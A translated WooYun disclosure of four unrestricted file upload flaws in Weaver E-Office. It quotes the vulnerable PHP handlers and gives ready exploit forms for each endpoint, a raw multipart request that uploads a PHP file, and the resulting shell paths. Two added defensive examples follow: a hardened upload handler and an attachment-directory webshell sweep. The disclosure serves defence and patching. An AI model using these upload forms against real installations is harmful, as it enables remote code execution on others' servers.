Defect ID: WooYun-2015-0125592
Title: Weaver E-Office (泛微Eoffice): three arbitrary file upload points allow direct getshell
Vendor: Weaver E-Office (泛微E-Office)
Author: Bear baby
Submitted: 2015-07-11 12:10
Published: 2015-10-11 14:18
Vulnerability type: file upload leading to arbitrary code execution
Severity: High
Self-assessed Rank: 17
Status: handed over to a third-party partner (CNCERT, National Internet Emergency Center) for handling
Tags:
2015-07-11: Details sent to the vendor; awaiting the vendor's response
2015-07-13: Vendor confirmed; details disclosed to the vendor only
2015-07-16: Details opened to third-party security partners (NSFOCUS 绿盟科技, 唐朝安全巡航, 无声信息)
2015-09-06: Details opened to core white hats and experts in the relevant fields
2015-09-16: Details opened to regular white hats
2015-09-26: Details opened to intern white hats
2015-10-11: Details made public
Two days of grinding in the lab... here comes a batch.
1. File location: /webservice/upload.php. The relevant code:
    <?php
    include_once( "inc/utility_all.php" );
    $pathInfor = pathinfo( $_FILES['file']['tmp_name'] );
    $extension = $pathInfor['extension'];
    $role = UPLOADROLE;
    $attachmentID = createfiledir( );
    global $ATTACH_PATH;
    $path = $ATTACH_PATH.$attachmentID;
    if ( !file_exists( $path ) )
    {
        mkdir( $path, 448 );
    }
    $attachmentName = $_FILES['file']['tmp_name'];
    $fileName = $path."/".$_FILES['file']['name'];
    $fileName = iconv( "UTF-8", "GBK", $fileName );
    move_uploaded_file( $_FILES['file']['tmp_name'], $fileName );
    if ( !file_exists( $fileName ) )
    {
        echo "false";
    }
    else
    {
        echo $fileName;
        echo $attachmentID."*".$_FILES['file']['name'];
    }
    ?>
No restriction of any kind is applied before the upload is accepted; the file keeps its original name and is written to the following path:

    $path = $ATTACH_PATH.$attachmentID;
    $fileName = $path."/".$_FILES['file']['name'];
Construct an upload form as follows (网站地址 stands for the target host):

    <form action="http://网站地址/webservice/upload.php" enctype="multipart/form-data" method="POST">
        <input name="file" type="file">
        <input name="" type="submit">
    </form>
As shown in the figure below, the response 3023528241*i.php corresponds to the path /attachment/3023528241/i.php.
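The root cause is the same in every handler quoted in this report: the stored name is built from the client-supplied `$_FILES[...]['name']`, nothing checks the extension (in upload.php the `$extension` variable is even computed from `tmp_name`, which has no extension, and is never used), and the target directory sits under the web root where PHP executes. The following is an added example of what a hardened replacement looks like; it is not E-Office code. It assumes the field is still called `file`, that uploads go to a directory outside `DOCUMENT_ROOT` (the `private_uploads` location is a placeholder) and are served back through a download script, and that the caller has already been authenticated by the surrounding application.

```php
<?php
// Added example (not E-Office code): hardened upload handler.
// Assumptions: $storageRoot is OUTSIDE the web root and files are served
// back through a download script, never by direct URL; field name "file"
// matches the quoted upload.php; authentication is handled by the caller.

declare(strict_types=1);

/** Extensions the application actually needs; everything else is rejected. */
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'docx', 'xlsx', 'zip'];

/** Content types each permitted extension may carry, as sniffed by libmagic. */
const ALLOWED_MIME = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
    'pdf'  => ['application/pdf'],
    'docx' => ['application/vnd.openxmlformats-officedocument.wordprocessingml.document'],
    'xlsx' => ['application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'],
    'zip'  => ['application/zip'],
];

const MAX_UPLOAD_BYTES = 20 * 1024 * 1024;

/**
 * Validates one entry of $_FILES and moves it to a random, non-guessable name.
 * Returns the stored path relative to $storageRoot, or throws on any rejection.
 */
function storeUpload(array $file, string $storageRoot): string
{
    if (!isset($file['error']) || is_array($file['error'])) {
        throw new RuntimeException('malformed upload');
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $file['error']);
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Take the extension from the ORIGINAL name (not tmp_name, as upload.php does),
    // after the last dot only, lower-cased, and check it against the allowlist.
    // The client-supplied $file['type'] is never consulted.
    $original = basename($file['name']);
    $ext = strtolower(pathinfo($original, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        throw new RuntimeException('extension not permitted');
    }

    // Cross-check the real content with libmagic so a .jpg must actually be a JPEG.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = (string) $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME[$ext], true)) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }

    // The stored name contains nothing the client chose: no way to plant a
    // script name, no path traversal, no predictable location.
    $dir = $storageRoot . '/' . date('Y/m');
    if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
        throw new RuntimeException('cannot create storage directory');
    }
    $target = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('move_uploaded_file failed');
    }
    chmod($target, 0600); // data, not code: no execute bit

    // The mapping stored-token -> original display name belongs in the database.
    return substr($target, strlen($storageRoot) + 1);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    // Placeholder location; must resolve to a directory outside DOCUMENT_ROOT.
    $storageRoot = dirname(__DIR__, 2) . '/private_uploads';
    header('Content-Type: application/json');
    try {
        echo json_encode(['ok' => true, 'path' => storeUpload($_FILES['file'], $storageRoot)]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['ok' => false, 'error' => $e->getMessage()]);
    }
}
```

If the product cannot be changed to store attachments outside the web root, the second line of defence is to disable script execution for the `/attachment` tree in the web server configuration; the allowlist above still has to be applied first, because a later configuration change can silently re-enable execution.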
2. File location: inc/jquery/uploadify/uploadify.php. The relevant code:
    <?php
    function createFileDir( )
    {
        global $ATTACH_PATH;
        mt_srand( ( double )microtime( ) * 1000000 );
        $RADOM_ID = mt_rand( ) + mt_rand( );
        if ( !file_exists( $ATTACH_PATH.$RADOM_ID ) )
        {
            return $RADOM_ID;
        }
        else
        {
            createfiledir( );
        }
    }
    if ( !empty( $_FILES ) )
    {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $attachmentID = createfiledir( );
        $uploadPath = $_REQUEST['uploadPath'];
        if ( trim( $uploadPath ) == "" )
        {
            $targetPath = $_SERVER['DOCUMENT_ROOT']."/attachment/".$attachmentID;
        }
        else
        {
            $targetPath = $uploadPath."/sent/attachment/".$attachmentID;
        }
        if ( !file_exists( $targetPath ) )
        {
            mkdir( $targetPath, 448, true );
        }
        $targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];
        move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
        echo $attachmentID;
    }
    ?>
Again there is no filtering at all; the file keeps its original name, so a shell can be uploaded directly.

    $targetPath = $uploadPath."/sent/attachment/".$attachmentID;
    $targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];
Construct an upload form as follows:

    <form action="http://网站地址/inc/jquery/uploadify/uploadify.php" enctype="multipart/form-data" method="POST">
        <input name="Filedata" type="file">
        <input name="" type="submit">
    </form>
As shown in the figure below, the response 1720699075 corresponds to the path /attachment/1720699075/2.php.
3. File location: /general/weibo/javascript/LazyUploadify/uploadify.php. Part of the relevant code:
    <?php
    // ... part of the code omitted ...
    include_once( "inc/conn.php" );
    if ( !empty( $_FILES ) )
    {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $fileName = $_FILES['Filedata']['name'];
        $thumbWidth = $_REQUEST['thumbWidth'];
        $thumbHeight = $_REQUEST['thumbHeight'];
        $attachmentID = createfiledir( );
        $targetPath = ROOT_PATH."/attachment/".$attachmentID."/";
        if ( !file_exists( $targetPath ) )
        {
            mkdir( $targetPath, 448, true );
        }
        $targetPath = str_replace( "//", "/", $targetPath );
        $targetOriginalFile = $targetPath.$fileName;
        $targetOriginalFile = iconv( "UTF-8", "GBK", $targetOriginalFile );
        move_uploaded_file( $tempFile, $targetOriginalFile );
        $fileExt = strtolower( substr( $fileName, strrpos( $fileName, "." ) ) );
        switch ( $fileExt )
        {
            case ".jpg" :
            case ".jpeg" :
            case ".png" :
            case ".gif" :
                $targetThumbPath = ROOT_PATH."/attachment/thumb/".$attachmentID;
                if ( !file_exists( $targetThumbPath ) )
                {
                    mkdir( $targetThumbPath, 448, true );
                }
                $targetThumbFile = $targetThumbPath."/".$fileName;
                $targetThumbFile = iconv( "UTF-8", "GBK", $targetThumbFile );
                resizeimage( $targetOriginalFile, $targetThumbFile, $thumbWidth, $thumbHeight );
                break;
        }
        $targetThumbFile = iconv( "GB2312", "UTF-8", $targetThumbFile );
        $returnValue['thubmPath'] = str_replace( ROOT_PATH, "", $targetThumbFile );
        $returnValue['attachmentID'] = $attachmentID;
        $returnValue['attachmentName'] = $fileName;
        $returnValue['attachmentSize'] = filesize( $targetOriginalFile );
        echo json_encode( $returnValue );
    }
    ?>
Still no filtering whatsoever; direct getshell. The form:

    <form action="http://网站地址/general/weibo/javascript/LazyUploadify/uploadify.php" enctype="multipart/form-data" method="POST">
        <input name="Filedata" type="file">
        <input name="" type="submit">
    </form>
As shown in the figure below, the response is JSON. The corresponding path is /attachment/2012291572/2.php.
4. File location: /general/weibo/javascript/uploadify/uploadify.php. Part of the code:
    include_once( "inc/conn.php" );
    include_once( "general/weibo/inc/weibo.inc.php" );
    include_once( "general/weibo/inc/thumb_handler.php" );
    if ( !empty( $_FILES ) )
    {
        if ( $_REQUEST['uploadType'] == "log" )
        {
            $tempFile = $_FILES['Filedata']['tmp_name'];
            $fileName = $_FILES['Filedata']['name'];
            $targetPath = ROOT_PATH."/attachment/";
            $fileExt = substr( $fileName, strrpos( $fileName, "." ) );
            $logName = "log".$fileExt;
            $targetFile = str_replace( "//", "/", $targetPath )."/".$logName;
            move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
            resize( $targetFile, $targetFile, 295, 195 );
            $query = "SELECT * FROM unit";
            $result = exequery( $connection, $query );
            if ( mysql_num_rows( $result ) == 0 )
            {
                $query = "INSERT INTO unit (LOGO) VALUES ('".$logName."')";
            }
            else
            {
                $query = "UPDATE unit SET LOGO = '".$logName."'";
            }
            if ( exequery( $connection, $query ) )
            {
                echo $logName;
            }
            else
            {
                echo false;
            }
        }
        else
        {
            $tempFile = $_FILES['Filedata']['tmp_name'];
            $fileName = $_FILES['Filedata']['name'];
            $userID = $_REQUEST['userID'];
            $thumbWidth = $_REQUEST['thumbWidth'];
            $thumbHeight = $_REQUEST['thumbHeight'];
            $targetPath = ROOT_PATH."/attachment/personal/".$userID;
            if ( !file_exists( $targetPath ) )
            {
                mkdir( $targetPath, 448, true );
            }
            $fileExt = substr( $fileName, strrpos( $fileName, "." ) );
            $targetFile = str_replace( "//", "/", $targetPath )."/".$userID."_temp".$fileExt;
            move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
            $windowWidth = $_REQUEST['windowWidth'];
            $windowHeight = $_REQUEST['windowHeight'];
            resize( $targetFile, $targetFile, $windowWidth - 40, $windowHeight - 100 );
            list( $width, $height ) = getimagesize( $targetFile );
            echo json_encode( array(
                "width" => $width,
                "height" => $height,
                "imageSrc" => "/".str_replace( ROOT_PATH, "", $targetFile )
            ) );
        }
    }
    ?>
The form can be constructed by the reader. The Fiddler request:

    POST **.**.**.**/general/weibo/javascript/uploadify/uploadify.php?uploadType=log HTTP/1.1
    Host: **.**.**.**
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: zou__Session=7f895dd642da7e165f485c5a638224e4; PHPSESSID=9ed7d522a1e2caf3f2fe76082450b3a8
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------94401197120954
    Content-Length: 214

    -----------------------------94401197120954
    Content-Disposition: form-data; name="Filedata"; filename="2.php"
    Content-Type: application/x-php

    <?php phpinfo();?>
    -----------------------------94401197120954--
The shell path is then /attachment/log.php.
With a userID, the corresponding path is /attachment/personal/$userID/$userID_temp.php, as shown in the figure below.
Picked one of phith0n's cases at random to test against.
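The four findings give a defender a precise list of where attacker-controlled names end up: /attachment/&lt;randomID&gt;/&lt;original name&gt;, /attachment/log.&lt;ext&gt; and /attachment/personal/&lt;userID&gt;/&lt;userID&gt;_temp.&lt;ext&gt;, all under the web root. The following added example (not E-Office code) is a read-only sweep of that tree for a compromise assessment: it flags files with a script extension, script extensions hidden inside a name, and files carrying a PHP open tag while claiming an image or document extension. It assumes the web root is passed on the command line (the `/var/www/html` default is a placeholder) and that the server maps the listed extensions to PHP; adjust `SCRIPT_EXTENSIONS` to the actual handler configuration.

```php
<?php
// Added example (not E-Office code): sweep the attachment tree for files that
// should never be there. Run from the CLI on the server or on a forensic copy;
// it only reads and prints, it modifies nothing.
// Usage: php sweep_attachments.php /path/to/web/root

declare(strict_types=1);

/** Extensions commonly mapped to the PHP handler; match this to the real server config. */
const SCRIPT_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'pht', 'phar', 'inc'];

/** How many leading bytes to inspect for a PHP open tag. */
const HEAD_BYTES = 65536;

/**
 * Scans $dir recursively and returns one finding per suspicious file as
 * ['path' => ..., 'reason' => ..., 'size' => ..., 'mtime' => ...].
 */
function sweepAttachments(string $dir): array
{
    if (!is_dir($dir)) {
        throw new InvalidArgumentException("not a directory: $dir");
    }
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        /** @var SplFileInfo $file */
        if (!$file->isFile()) {
            continue;
        }
        $name = $file->getFilename();
        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        $isScriptExt = in_array($ext, SCRIPT_EXTENSIONS, true);
        $reasons = [];

        // 1. A script extension anywhere under an upload directory is never legitimate.
        //    This catches the /attachment/<id>/x.php, log.php and <uid>_temp.php cases.
        if ($isScriptExt) {
            $reasons[] = 'script extension';
        }

        // 2. Script extension buried in the name (shell.php.jpg); relevant when
        //    the server is misconfigured to hand such names to PHP.
        $parts = explode('.', strtolower($name));
        if (count($parts) > 2
            && array_intersect(array_slice($parts, 1, -1), SCRIPT_EXTENSIONS) !== []) {
            $reasons[] = 'script extension embedded in name';
        }

        // 3. PHP open tag inside a file that claims to be something else.
        if (!$isScriptExt) {
            $head = (string) file_get_contents($file->getPathname(), false, null, 0, HEAD_BYTES);
            if (preg_match('/<\?(php\b|=)/i', $head) === 1) {
                $reasons[] = 'PHP open tag in non-script file';
            }
        }

        if ($reasons !== []) {
            $findings[] = [
                'path'   => $file->getPathname(),
                'reason' => implode('; ', $reasons),
                'size'   => $file->getSize(),
                'mtime'  => date('c', $file->getMTime()),
            ];
        }
    }
    // Newest first: in an incident the most recent drops are what you triage first.
    usort($findings, fn(array $a, array $b): int => strcmp($b['mtime'], $a['mtime']));
    return $findings;
}

$webRoot = $argv[1] ?? '/var/www/html'; // placeholder; pass the real ROOT_PATH
foreach (sweepAttachments($webRoot . '/attachment') as $f) {
    printf("%s\t%d bytes\t%s\t%s\n", $f['mtime'], $f['size'], $f['path'], $f['reason']);
}
```

Every hit is a file to preserve and examine, not to delete on sight: the modification time and the matching web server access-log entries for the four upload endpoints give the timeline, and the file contents show what the attacker actually ran.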
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-07-13 14:17
CNVD has confirmed the reported situation and has notified the software vendor through its established handling channels.
None yet
Ah, this is a small vendor; looks like you found those file upload spots.
@menmen519 You posted a batch yesterday... the ones you found I probably have too... lost out
@Bear baby The latest version has quite a few bugs; there should be six file upload points. Still, getting 2000 feels pretty good, doesn't it?
@menmen519 Didn't get 2000
@Bear baby Fine, the "thunder" one should be 5000, prolific
@Bear baby Was it 1500?
Good grief, these all went straight to $$. I'll go dig around some more
@menmen519 @Bear baby Two big shots chatting and laughing
Saw "a thousand US dollars" and came in first to watch and learn